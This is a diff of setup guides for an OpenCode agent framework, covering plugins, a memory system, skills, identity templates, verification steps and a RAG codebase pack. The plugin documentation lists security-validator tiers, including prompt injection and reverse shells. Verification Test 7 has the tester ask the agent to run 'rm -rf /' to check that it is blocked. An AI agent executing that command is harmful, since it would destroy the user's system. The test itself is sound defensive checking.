`${SESSIONS_DIR}/${sessionId}.json`, + JSON.stringify(summary, null, 2) + ); + + console.log(`[Session] Summary saved: ${sessionId}`); + } + }, + }; +}; + +export default SessionManager; +``` + +### Step 2.4: Create Event Logger Plugin + +Create `.opencode/plugin/event-logger.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { appendFileSync, existsSync, mkdirSync } from "fs"; + +const RAW_OUTPUT_DIR = ".opencode/memory/raw-outputs"; + +export const EventLogger: Plugin = async ({ client, $ }) => { + // Ensure directory exists + if (!existsSync(RAW_OUTPUT_DIR)) { + mkdirSync(RAW_OUTPUT_DIR, { recursive: true }); + } + + return { + tool: { + execute: { + after: async (input, output) => { + try { + const logEntry = { + timestamp: new Date().toISOString(), + tool_name: input.name, + tool_input: input.input, + success: !output.error, + }; + + // Append to daily log file + const today = new Date().toISOString().split("T")[0]; + const logFile = `${RAW_OUTPUT_DIR}/${today}.jsonl`; + + appendFileSync(logFile, JSON.stringify(logEntry) + "\n"); + } catch (error) { + // Silent fail - logging should never break execution + } + }, + }, + }, + }; +}; + +export default EventLogger; +``` + +### Step 2.5: Create Context Loader Plugin + +Create `.opencode/plugin/context-loader.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { readFileSync, existsSync } from "fs"; + +const CORE_SKILL_PATH = ".opencode/skill/core/SKILL.md"; +const AGENTS_PATH = "AGENTS.md"; + +export const ContextLoader: Plugin = async ({ client, $ }) => { + // Load core context at startup + let coreContext = ""; + let agentIdentity = ""; + + if (existsSync(CORE_SKILL_PATH)) { + coreContext = readFileSync(CORE_SKILL_PATH, "utf-8"); + console.log("[Context] Core skill loaded"); + } + + if (existsSync(AGENTS_PATH)) { + agentIdentity = readFileSync(AGENTS_PATH, "utf-8"); + console.log("[Context] Agent identity loaded"); + } + + return { + // Context is loaded at plugin initialization + // Available for reference throughout the session + }; +}; + +export default ContextLoader; +``` + +--- + +## Part 3: Memory System + +The Memory System provides persistent knowledge across sessions using a three-tier architecture. + +### Step 3.1: Create Memory README + +Create `.opencode/memory/README.md`: + +```markdown +# Memory System + +Persistent memory architecture for session history, learnings, and operational state. + +## Directory Structure + +| Directory | Purpose | Retention | +| -------------- | ---------------------------- | --------------- | +| `research/` | Deep research outputs | Permanent | +| `sessions/` | Session summaries | Rolling 90 days | +| `learnings/` | Learning moments | Permanent | +| `decisions/` | Architectural Decision Records | Permanent | +| `execution/` | Task execution logs | Rolling 30 days | +| `security/` | Security event logs | Permanent | +| `recovery/` | Recovery snapshots | Rolling 7 days | +| `raw-outputs/` | JSONL event streams | Rolling 7 days | +| `backups/` | Pre-refactoring backups | As needed | +| `state/` | Current operational state | Active | +| `signals/` | Pattern detection | Active | +| `work/` | Per-task memory | Active | +| `learning/` | Phase-based learnings | Permanent | + +## Three-Tier Memory Model + +### 1. CAPTURE (Hot) - Per-Task Work + +Current work items in `work/[task-name_timestamp]/`: + +- `work.md` - Goal, result, signal tracking +- `trace.jsonl` - Decision trace +- `output/` - Deliverables produced + +### 2. SYNTHESIS (Warm) - Aggregated Learning + +Learnings organized by phase in `learning/`: + +- `observe/` - Context gathering learnings +- `think/` - Hypothesis generation learnings +- `plan/` - Execution planning learnings +- `build/` - Success criteria learnings +- `execute/` - Implementation learnings +- `verify/` - Verification learnings + +### 3. APPLICATION (Cold) - Archived History + +Historical data organized by date in main directories. + +## Privacy + +Add to .gitignore: + +``` +.opencode/memory/raw-outputs/ +.opencode/memory/sessions/ +.opencode/memory/security/ +``` +``` + +### Step 3.2: Initialize State Files + +Create `.opencode/memory/state/active-work.json`: + +```json +{ + "current_task": null, + "started_at": null, + "status": "idle" +} +``` + +### Step 3.3: Initialize Signal Files + +Create `.opencode/memory/signals/README.md`: + +```markdown +# Signals + +Real-time pattern detection and anomaly tracking. + +## Signal Files + +| File | Purpose | +| ----------------- | --------------------------- | +| `failures.jsonl` | VERIFY failures with context | +| `loopbacks.jsonl` | Phase loopback events | +| `patterns.jsonl` | Weekly aggregated patterns | + +## Format + +Each file uses JSONL (JSON Lines) format - one JSON object per line. +``` + +--- + +## Part 4: Skills System + +The Skills System provides modular domain expertise with on-demand loading. + +### Step 4.1: Create Core Skill + +Create `.opencode/skill/core/SKILL.md`: + +```markdown +--- +name: core +description: Core identity and configuration. Provides agent identity, capabilities overview, and operating principles. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# Core - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Examples + +**Example: Identity query** + +``` +User: "Who are you?" +-> Reads core skill +-> Returns identity information +``` + +**Example: Capability check** + +``` +User: "What can you do?" +-> Lists available capabilities +-> References other skills if installed +``` + +--- + +## Identity + +**Agent:** +**Role:** +**Organization:** + +--- + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Plugin System**: Event-driven automation +- **MCP Integration**: External tool access + +--- + +## Quick Reference + +- Skills directory: `.opencode/skill/` +- Memory directory: `.opencode/memory/` +- Configuration: `opencode.json` +``` + +### Step 4.2: Create Skill System Documentation + +Create `.opencode/docs/SKILLSYSTEM.md`: + +```markdown +# OpenCode Skill System + +The configuration system for all skills. + +## Skill Structure + +Every skill follows this structure: + +``` +skill-name/ +├── SKILL.md # Main skill file (required) +├── context.md # Additional context (optional) +├── tools/ # CLI tools +│ └── tool-name.ts +└── workflows/ # Execution workflows + └── workflow-name.md +``` + +## SKILL.md Format + +### YAML Frontmatter + +```yaml +--- +name: skill-name +description: [What it does]. USE WHEN [intent triggers]. [Additional capabilities]. +--- +``` + +**Rules:** + +- `name` must be lowercase alphanumeric with hyphens +- `name` pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` +- `name` length: 1-64 characters +- `description` is a single line, max 1024 characters +- `USE WHEN` keyword is recommended for activation + +### Markdown Body + +```markdown +# skill-name + +[Brief description] + +## Workflow Routing + +| Workflow | Trigger | File | +| ---------- | ------------ | ----------------------- | +| **Create** | "create new" | `workflows/create.md` | + +## Examples + +**Example 1:** + +User: "[Request]" +-> [Action taken] +-> [Result] +``` + +## Skill Loading + +1. **Discovery**: OpenCode scans skill directories at startup +2. **Metadata**: Only YAML frontmatter loads initially +3. **Invocation**: Full SKILL.md body loads when agent calls skill +4. **Workflow Execution**: Additional files load on-demand + +## Skill Locations + +OpenCode searches these locations (in order): + +1. `.opencode/skill//SKILL.md` (project) +2. `~/.config/opencode/skill//SKILL.md` (global) +3. `.claude/skills//SKILL.md` (Claude-compatible) +4. `~/.claude/skills//SKILL.md` (Claude-compatible global) + +## Permission Control + +In `opencode.json`: + +```json +{ + "skill": { + "allow": ["*"], + "deny": ["internal-*"] + } +} +``` + +- `allow` - immediate access +- `deny` - hidden from agents +- Patterns support wildcards +``` + +### Step 4.3: Create CreateSkill Skill + +Create `.opencode/skill/create-skill/SKILL.md`: + +```markdown +--- +name: create-skill +description: Creates new skills following the standard structure. USE WHEN user wants to create a new skill OR add new capability OR needs a custom workflow. +--- + +# create-skill + +Creates properly structured skills following the OpenCode Skills System specification. + +## Workflow Routing + +| Workflow | Trigger | File | +| ---------- | -------------------------- | ----------------------- | +| **Create** | "create skill", "new skill" | `workflows/create.md` | + +## Examples + +**Example: Create a research skill** + +``` +User: "Create a skill for code review" +-> Creates .opencode/skill/code-review/SKILL.md +-> Adds proper YAML frontmatter with USE WHEN +-> Creates workflows/ and tools/ directories +-> Returns confirmation with skill path +``` + +## Skill Template + +When creating a skill, use this template: + +```markdown +--- +name: skill-name +description: [Purpose]. USE WHEN [triggers]. +--- + +# skill-name + +[Description] + +## Workflow Routing + +| Workflow | Trigger | File | +| -------- | ------- | ---- | + +## Examples + +**Example:** + +User: "[Request]" +-> [Process] +-> [Result] +``` + +## Naming Rules + +- Lowercase alphanumeric only +- Hyphens allowed (not at start/end) +- Pattern: `^[a-z0-9]+(-[a-z0-9]+)*$` +- Length: 1-64 characters + +**Valid:** `code-review`, `my-skill`, `api-client` +**Invalid:** `Code-Review`, `my_skill`, `--skill` +``` + +--- + +## Part 5: Documentation + +### Step 5.1: Create Memory System Documentation + +Create `.opencode/docs/MEMORYSYSTEM.md`: + +```markdown +# OpenCode Memory System + +Persistent memory architecture for maintaining context across sessions. + +## Architecture + +### Three-Tier Model + +| Tier | Temperature | Purpose | Location | +| --------------- | ----------- | ---------------------- | ----------------- | +| **CAPTURE** | Hot | Active work items | `memory/work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `memory/learning/`| +| **APPLICATION** | Cold | Historical archive | `memory/sessions/`| + +### CAPTURE (Hot) + +Per-task memory stored in `work/[task-name_timestamp]/`: + +- `work.md` - Goal, result, signal tracking +- `trace.jsonl` - Decision trace +- `output/` - Deliverables produced + +### SYNTHESIS (Warm) + +Learnings organized by cognitive phase: + +- `observe/` - Context gathering insights +- `think/` - Hypothesis and analysis +- `plan/` - Execution planning +- `build/` - Construction learnings +- `execute/` - Implementation notes +- `verify/` - Validation results + +### APPLICATION (Cold) + +Long-term storage organized by date/category: + +- `sessions/` - Session summaries +- `decisions/` - Architectural Decision Records +- `research/` - Research outputs +- `learnings/` - Permanent learning moments + +## State Management + +Active state tracked in `memory/state/`: + +- `active-work.json` - Current task state +- `active-session.json` - Session info + +## Signal Detection + +Pattern detection in `memory/signals/`: + +- `failures.jsonl` - Failure patterns +- `loopbacks.jsonl` - Retry patterns +- `patterns.jsonl` - Aggregated patterns + +## Retention Policy + +| Directory | Retention | +| -------------- | --------------- | +| `raw-outputs/` | 7 days | +| `recovery/` | 7 days | +| `execution/` | 30 days | +| `sessions/` | 90 days | +| Others | Permanent | +``` + +### Step 5.2: Create Plugin System Documentation + +Create `.opencode/docs/PLUGINSYSTEM.md`: + +```markdown +# OpenCode Plugin System + +Event-driven automation through TypeScript plugins. + +## Plugin Structure + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; + +export const MyPlugin: Plugin = async ({ client, $ }) => { + return { + tool: { + execute: { + before: async (input, output) => { + // Before tool execution + }, + after: async (input, output) => { + // After tool execution + }, + }, + }, + event: async ({ event }) => { + // Handle lifecycle events + }, + }; +}; + +export default MyPlugin; +``` + +## Available Hooks + +### Tool Execution + +- `before` - Execute before any tool runs +- `after` - Execute after tool completion + +### Lifecycle Events + +- `session.idle` - Session completed + +## Configuration + +In `opencode.json`: + +```json +{ + "plugins": { + "plugin-name": { + "enabled": true + } + } +} +``` + +## Plugin Contexts + +| Context | Purpose | +| -------- | -------------------------- | +| `client` | OpenCode API access | +| `$` | Shell command execution | +| `app` | Application instance | +| `event` | Event stream data | + +## Installed Plugins + +| Plugin | Purpose | +| -------------------- | --------------------------- | +| `security-validator` | 10-tier command validation | +| `session-manager` | Session lifecycle handling | +| `event-logger` | Tool execution logging | +| `context-loader` | Context initialization | + +## Security Validator Tiers + +1. Catastrophic (BLOCK) - rm -rf, disk destruction +2. Reverse Shells (BLOCK) - bash -i, netcat shells +3. Credential Theft (BLOCK) - curl|sh patterns +4. Prompt Injection (BLOCK) - instruction manipulation +5. Environment Manipulation (WARN) - API key access +6. Git Dangerous (WARN) - force push, hard reset +7. System Modification (LOG) - chmod, sudo +8. Network Operations (LOG) - ssh, scp +9. Data Exfiltration (BLOCK) - upload patterns +10. Infrastructure Protection (BLOCK) - rm .opencode +``` + +--- + +## Part 6: Agent Identity + +### Step 6.1: Create config.yaml + +Create `.opencode/config/config.yaml`: + +```yaml +version: "1.0.0" +infrastructure: + name: "OpenCode Cognitive Infrastructure" + installed: "" + +agent: + name: "" + persona: "" + type: "" + organization: "" + +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" + skill_activation: "trigger_based" + +capabilities: + memory: true + skills: true + plugins: true + mcp: true +``` + +### Step 6.2: Create Root AGENTS.md + +Create `AGENTS.md` in agent root directory: + +```markdown +# : + +## Your Name + +Your name is ****. You are the for . + +## Your Mission + + + +## Your Role + + + +## Core Responsibilities + +### Primary Functions + +- +- +- + +### Supporting Tasks + +- +- + +## System Architecture + +You operate within the OpenCode Cognitive Infrastructure: + +- **Skills Framework** (`.opencode/skill/`): Modular domain expertise +- **Memory System** (`.opencode/memory/`): Persistent knowledge +- **Plugin System** (`.opencode/plugin/`): Event-driven automation +- **Configuration** (`opencode.json`): Runtime settings + +## Memory Management + +**CRITICAL:** Update work status after EVERY conversation turn to maintain continuity. + +- Read relevant memories before starting work +- Update memories after significant interactions +- Keep work status current at `.opencode/memory/state/` + +## Organization Context + + + +--- + +_OpenCode Cognitive Infrastructure v1.0.0_ +``` + +--- + +## Part 7: Gitignore Configuration + +### Step 7.1: Create/Update .gitignore + +Add to `.gitignore` in agent root: + +```gitignore +# OpenCode Cognitive Infrastructure - Private Data +.opencode/memory/raw-outputs/ +.opencode/memory/sessions/ +.opencode/memory/security/ +.opencode/memory/state/ +.opencode/memory/signals/ +.opencode/memory/work/ + +# Keep structure but ignore contents +!.opencode/memory/.gitkeep +!.opencode/memory/state/.gitkeep +``` + +### Step 7.2: Create .gitkeep Files + +```bash +touch .opencode/memory/.gitkeep +touch .opencode/memory/state/.gitkeep +touch .opencode/memory/signals/.gitkeep +touch .opencode/memory/work/.gitkeep +touch .opencode/memory/learning/.gitkeep +``` + +--- + +## Part 8: Plugin Dependencies + +### Step 8.1: Initialize Package.json (Optional) + +If using npm for plugin dependencies: + +```bash +cd .opencode/plugin +npm init -y +npm install @opencode-ai/plugin --save-dev +``` + +Or with bun: + +```bash +cd .opencode/plugin +bun init -y +bun add @opencode-ai/plugin --dev +``` + +--- + +## Post-Implementation Checklist + +After all files are created: + +- [ ] Verify all directories exist +- [ ] Validate JSON syntax in opencode.json +- [ ] Validate YAML syntax in config.yaml +- [ ] Ensure plugin files have valid TypeScript syntax +- [ ] Verify skill names follow naming convention +- [ ] Verify AGENTS.md has been customized with agent identity +- [ ] Confirm .gitignore excludes sensitive data +- [ ] Test OpenCode can start in directory: `opencode` + +--- + +## Next Phase + +Proceed to **5_VERIFY.md** to verify the installation. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md b/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md new file mode 100644 index 0000000..9445d53 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/5_VERIFY.md @@ -0,0 +1,251 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the OpenCode Cognitive Infrastructure is correctly installed and functional. + +## Verification Checklist + +### 1. Directory Structure + +Verify all directories exist: + +- [ ] `.opencode/` directory exists +- [ ] `.opencode/config/` exists +- [ ] `.opencode/skill/core/` exists +- [ ] `.opencode/skill/create-skill/` exists +- [ ] `.opencode/plugin/` exists +- [ ] `.opencode/memory/` exists +- [ ] `.opencode/memory/state/` exists +- [ ] `.opencode/memory/signals/` exists +- [ ] `.opencode/memory/learning/` exists +- [ ] `.opencode/command/` exists +- [ ] `.opencode/agents/` exists +- [ ] `.opencode/docs/` exists + +### 2. Core Files + +Verify essential files are in place: + +- [ ] `AGENTS.md` exists in agent root +- [ ] `opencode.json` exists in agent root +- [ ] `.opencode/VERSION` contains "1.0.0" +- [ ] `.opencode/config/config.yaml` exists and is valid YAML +- [ ] `.opencode/skill/core/SKILL.md` exists +- [ ] `.opencode/skill/create-skill/SKILL.md` exists + +### 3. Plugin System + +Verify plugins are properly configured: + +- [ ] `.opencode/plugin/security-validator.ts` exists +- [ ] `.opencode/plugin/session-manager.ts` exists +- [ ] `.opencode/plugin/event-logger.ts` exists +- [ ] `.opencode/plugin/context-loader.ts` exists +- [ ] `opencode.json` references all plugins +- [ ] Plugin files have valid TypeScript syntax + +### 4. Memory System + +Verify memory files: + +- [ ] `.opencode/memory/README.md` exists +- [ ] `.opencode/memory/state/active-work.json` exists +- [ ] `.opencode/memory/signals/README.md` exists +- [ ] Learning phase directories exist (observe, think, plan, build, execute, verify) + +### 5. Skills System + +Verify skill configuration: + +- [ ] Skill names are lowercase with hyphens +- [ ] SKILL.md files have valid YAML frontmatter +- [ ] Core skill has `USE WHEN` in description +- [ ] `opencode.json` has skill permissions configured + +### 6. Content Validation + +#### AGENTS.md +- [ ] Contains agent name +- [ ] Contains persona name +- [ ] Contains mission statement +- [ ] Contains role description +- [ ] Contains memory management instructions + +#### opencode.json +- [ ] Valid JSON syntax +- [ ] Has `$schema` reference +- [ ] Contains plugins configuration +- [ ] Contains skill permissions + +#### core/SKILL.md +- [ ] Valid YAML frontmatter +- [ ] Name is lowercase (`core`) +- [ ] Description under 1024 characters +- [ ] Contains `USE WHEN` trigger + +## Functional Testing + +### Test 1: OpenCode Startup + +```bash +opencode +``` + +**Expected**: OpenCode starts without errors and loads the agent context. + +### Test 2: Skill Discovery + +In OpenCode, ask: "What skills are available?" + +**Expected**: OpenCode should list the core and create-skill skills. + +### Test 3: Identity Check + +Ask the agent: "Who are you?" + +**Expected**: Agent should respond with its persona name, role, and purpose from AGENTS.md. + +### Test 4: Memory Access + +Ask the agent: "What's your current work status?" + +**Expected**: Agent should read and report from `.opencode/memory/state/`. + +### Test 5: Skill Invocation + +Ask: "Use the core skill" + +**Expected**: Agent should invoke the core skill and display identity information. + +### Test 6: Plugin Verification + +Run a safe shell command and check logs: + +```bash +# After running a command in OpenCode, check: +cat .opencode/memory/raw-outputs/$(date +%Y-%m-%d).jsonl +``` + +**Expected**: Event logger should have recorded the command execution. + +### Test 7: Security Validator + +In OpenCode, attempt: "Run `rm -rf /`" + +**Expected**: Security validator should BLOCK the command. + +## Validation Commands + +### Check Directory Structure + +```bash +find .opencode -type d | head -20 +``` + +### Validate JSON Files + +```bash +# opencode.json +python3 -c "import json; json.load(open('opencode.json'))" && echo "Valid JSON" + +# active-work.json +python3 -c "import json; json.load(open('.opencode/memory/state/active-work.json'))" && echo "Valid JSON" +``` + +### Check Skill Names + +```bash +# Should all be lowercase with hyphens +ls -1 .opencode/skill/ +``` + +### Verify Plugin Syntax + +```bash +# If using TypeScript compiler +npx tsc --noEmit .opencode/plugin/*.ts + +# Or with bun +bun check .opencode/plugin/*.ts +``` + +## Success Criteria + +Installation is successful when: + +1. All directories exist +2. All core files are present +3. Files contain valid content +4. OpenCode starts without errors +5. Agent responds correctly to identity queries +6. Skills are discoverable and invokable +7. Plugins are loaded and functional +8. Memory read/write operations work +9. Security validator blocks dangerous commands + +## Troubleshooting + +### OpenCode Won't Start + +- Check `opencode.json` is valid JSON +- Verify plugin files have no syntax errors +- Check for conflicting configurations + +### Skills Not Found + +- Verify skill names are lowercase with hyphens +- Check SKILL.md has valid YAML frontmatter +- Ensure skill directories are in `.opencode/skill/` + +### Plugins Not Loading + +- Verify plugin exports default function +- Check plugin is enabled in `opencode.json` +- Look for TypeScript compilation errors + +### Memory Not Updating + +- Verify memory directory exists +- Check file permissions +- Ensure state files are valid JSON + +### Identity Not Loading + +- Verify AGENTS.md is in agent root (not in .opencode/) +- Check file permissions +- Ensure no syntax errors in markdown + +## Post-Verification + +Once verification passes: + +1. **Document completion** - Note installation date in config.yaml +2. **Test knowledge packs** - Ready to install additional skills +3. **Customize as needed** - Add agent-specific context and skills +4. **Configure MCP servers** - Add external tool integrations + +## Installation Complete + +The OpenCode Cognitive Infrastructure is now installed and operational. + +The agent has: + +- Persistent memory across sessions +- Modular skill system with discovery +- Event-driven plugin automation +- Security validation on shell commands +- Complete identity configuration +- MCP integration capability + +### Next Steps + +1. Add **custom skills** for domain expertise +2. Configure **MCP servers** for external tools +3. Customize AGENTS.md with additional instructions +4. Add custom **plugins** for automation +5. Begin using the agent with full cognitive capabilities + +--- + +_OpenCode Cognitive Infrastructure v1.0.0_ diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md new file mode 100644 index 0000000..db23438 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/0_INITIALIZE.md @@ -0,0 +1,41 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites for installing the codebase-expert knowledge pack. + +## Prerequisites Checklist + +### 1. OpenCode Cognitive Infrastructure + +Verify the agent has OpenCode Cognitive Infrastructure installed: + +- [ ] `.opencode/` directory exists +- [ ] `.opencode/skill/` directory exists +- [ ] `.opencode/memory/` directory exists +- [ ] `.opencode/VERSION` contains valid version + +### 2. Codebase Presence + +Verify there is a codebase to analyze: + +- [ ] Source code files exist in the agent directory +- [ ] At least one recognized language present (js, ts, py, go, etc.) + +### 3. Runtime Requirements + +Verify required tools are available: + +- [ ] Node.js (v18+) or Bun runtime +- [ ] npm available for dependencies + +## Validation Steps + +1. Check for `.opencode/` directory +2. Scan for source code files +3. Identify primary languages +4. Verify runtime availability + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md**. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md new file mode 100644 index 0000000..2672750 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/1_ANALYZE.md @@ -0,0 +1,59 @@ +# Phase 1: Analyze Codebase + +## Objective + +Analyze the codebase structure to plan optimal indexing strategy. + +## Analysis Tasks + +### 1. Directory Structure + +Map the codebase structure: + +- [ ] Identify source directories (src/, lib/, etc.) +- [ ] Locate test directories +- [ ] Find configuration files +- [ ] Note documentation locations + +### 2. Language Detection + +Identify languages and frameworks: + +| Extension | Language | Framework | +|-----------|----------|-----------| +| .ts, .tsx | TypeScript | | +| .js, .jsx | JavaScript | | +| .py | Python | | +| .go | Go | | +| .rs | Rust | | +| .java | Java | | + +### 3. File Inventory + +Count files by type: + +- Source files: ___ +- Test files: ___ +- Config files: ___ +- Documentation: ___ + +### 4. Key Entry Points + +Identify important files: + +- [ ] Main entry point(s) +- [ ] Package/module definition +- [ ] Primary exports +- [ ] API definitions + +## Analysis Outputs + +Document: +1. **Languages** - Primary and secondary languages +2. **Structure** - Directory organization pattern +3. **Size** - Total files and estimated tokens +4. **Entry Points** - Key files for understanding + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan indexing structure. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..7b3d49e --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/2_PLAN_STRUCTURE.md @@ -0,0 +1,64 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the indexing and installation structure for the codebase-expert pack. + +## Installation Structure + +``` +.opencode/ +├── skill/ +│ └── codebase-expert/ +│ └── SKILL.md # Skill definition +├── memory/ +│ └── knowledge/ +│ └── codebase/ +│ └── index.json # Codebase index metadata +├── plugin/ +│ └── lib/ +│ ├── embeddings.ts # Embedding generation +│ ├── vector-store.ts # Vector storage +│ └── chunking.ts # Document chunking +└── config/ + └── knowledge-packs.yaml # Registry entry +``` + +## Indexing Strategy + +### Files to Index + +Include: +- Source code files (.ts, .js, .py, .go, etc.) +- Configuration files (package.json, tsconfig.json, etc.) +- Documentation (.md files in docs/) + +Exclude: +- node_modules/ +- .git/ +- Build outputs (dist/, build/) +- Binary files +- Large generated files + +### Chunking Strategy + +- **Code files**: Chunk by function/class +- **Config files**: Keep whole +- **Documentation**: Chunk by section + +### Embedding Plan + +- Generate embeddings for each chunk +- Store in vector store for semantic search +- Index by file path and content type + +## Skill Configuration + +```yaml +name: codebase-expert +description: Deep expertise in the current codebase. USE WHEN user asks about code structure, architecture, implementations, or wants to find specific functionality. +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the plan. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md new file mode 100644 index 0000000..4b5840e --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/3_EVALUATE.md @@ -0,0 +1,58 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the indexing plan for completeness and feasibility. + +## Evaluation Checklist + +### 1. Coverage + +- [ ] All relevant source directories included +- [ ] Important file types identified +- [ ] Exclusions are appropriate +- [ ] No sensitive files will be indexed + +### 2. Scale + +- [ ] File count is manageable +- [ ] Estimated token count within limits +- [ ] Chunking strategy appropriate for size + +### 3. Quality + +- [ ] Chunking preserves semantic meaning +- [ ] Key files prioritized +- [ ] Entry points well-covered + +### 4. Performance + +- [ ] Indexing can complete in reasonable time +- [ ] Vector store size is acceptable +- [ ] Search latency will be acceptable + +### 5. OpenCode Compatibility + +- [ ] Skill name follows lowercase-with-hyphens convention +- [ ] SKILL.md has valid YAML frontmatter +- [ ] Description under 1024 characters +- [ ] Plugin files export proper types + +## Risk Assessment + +| Risk | Likelihood | Mitigation | +|------|------------|------------| +| Too many files | Medium | Apply stricter exclusions | +| Poor chunk quality | Low | Adjust chunking strategy | +| Large embeddings | Low | Reduce chunk size | + +## Approval Criteria + +- [ ] Coverage is comprehensive +- [ ] Scale is manageable +- [ ] OpenCode naming conventions followed +- [ ] No blocking issues + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md**. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md new file mode 100644 index 0000000..ccb8f02 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/4_IMPLEMENT.md @@ -0,0 +1,184 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the codebase-expert knowledge pack installation. + +--- + +## Prerequisites + +> **Important**: Before proceeding, you must configure an embedding provider. The default `embeddings.ts` contains placeholder code that returns random vectors. See the assets folder for the file to configure. + +### Embedding Provider Options + +1. **OpenAI** (recommended): Set `OPENAI_API_KEY` environment variable +2. **Ollama** (local): Run `ollama pull nomic-embed-text` +3. **Other**: Modify `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` for your provider + +## Implementation Steps + +### Step 1: Create Skill Directory + +```bash +mkdir -p .opencode/skill/codebase-expert +``` + +### Step 2: Install SKILL.md + +Copy the skill template from `{{AUTORUN_FOLDER}}/assets/templates/skills/codebase-expert/SKILL.md` to: +`.opencode/skill/codebase-expert/SKILL.md` + +### Step 3: Create Knowledge Directory + +```bash +mkdir -p .opencode/memory/knowledge/codebase +``` + +### Step 4: Configure Embedding Provider + +Before indexing, update `{{AUTORUN_FOLDER}}/assets/lib/embeddings.ts` with your chosen provider: + +**For OpenAI:** +```typescript +import OpenAI from 'openai'; +const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + +export async function generateEmbedding(text: string): Promise { + const response = await openai.embeddings.create({ + model: 'text-embedding-3-small', + input: text, + }); + return response.data[0].embedding; +} +``` + +**For Ollama (local):** +```typescript +export async function generateEmbedding(text: string): Promise { + const response = await fetch('http://localhost:11434/api/embeddings', { + method: 'POST', + body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + }); + return (await response.json()).embedding; +} +``` + +### Step 5: Install Library Files + +Copy the library files from `{{AUTORUN_FOLDER}}/assets/lib/` to `.opencode/plugin/lib/`: + +```bash +mkdir -p .opencode/plugin/lib +cp {{AUTORUN_FOLDER}}/assets/lib/*.ts .opencode/plugin/lib/ +``` + +### Step 6: Index Codebase + +For each source file: +1. Read file content +2. Chunk appropriately (by function/class for code) +3. Generate embeddings using your configured provider +4. Store in vector store + +**Example indexing script:** + +```typescript +import { chunkCode } from '.opencode/plugin/lib/chunking'; +import { generateEmbedding } from '.opencode/plugin/lib/embeddings'; +import { VectorStore } from '.opencode/plugin/lib/vector-store'; + +const store = new VectorStore('codebase'); + +for (const file of sourceFiles) { + const chunks = chunkCode(file.content, file.language); + for (const chunk of chunks) { + const embedding = await generateEmbedding(chunk.text); + store.add(embedding, chunk.text, { source: file.path }); + } +} +``` + +### Step 7: Create Index Metadata + +Create `.opencode/memory/knowledge/codebase/index.json`: + +```json +{ + "created": "", + "files_indexed": , + "chunks": , + "languages": ["", ""], + "embedding_provider": "", + "embedding_model": "", + "last_updated": "" +} +``` + +### Step 8: Update Registry + +Create or update `.opencode/config/knowledge-packs.yaml`: + +```yaml +packs: + - id: codebase-expert + name: "Codebase Expert" + installed: "" + version: "1.0.0" + embedding_provider: "" + sources: + - path: ".opencode/memory/knowledge/codebase/" + type: "directory" + skill_path: ".opencode/skill/codebase-expert/SKILL.md" +``` + +### Step 9: Create RAG Plugin (Optional) + +For automatic context injection, create `.opencode/plugin/rag-retrieval.ts`: + +```typescript +import type { Plugin } from "@opencode-ai/plugin"; +import { VectorStore } from "./lib/vector-store"; +import { generateEmbedding } from "./lib/embeddings"; + +export const RagRetrieval: Plugin = async ({ client, $ }) => { + const store = new VectorStore('codebase'); + + return { + tool: { + execute: { + before: async (input, output) => { + // Extract query from user input if relevant + // Search vector store + // Inject context if matches found + } + } + } + }; +}; + +export default RagRetrieval; +``` + +--- + +## Post-Implementation + +- [ ] Verify all files created +- [ ] Test embedding generation with a sample query +- [ ] Verify vector store contains indexed chunks +- [ ] Test semantic search returns relevant results +- [ ] Skill name follows lowercase convention (`codebase-expert`) + +## Troubleshooting + +| Issue | Solution | +|-------|----------| +| Random/irrelevant results | Embedding provider not configured (still using placeholder) | +| API errors | Check API key and network connectivity | +| Empty results | Verify 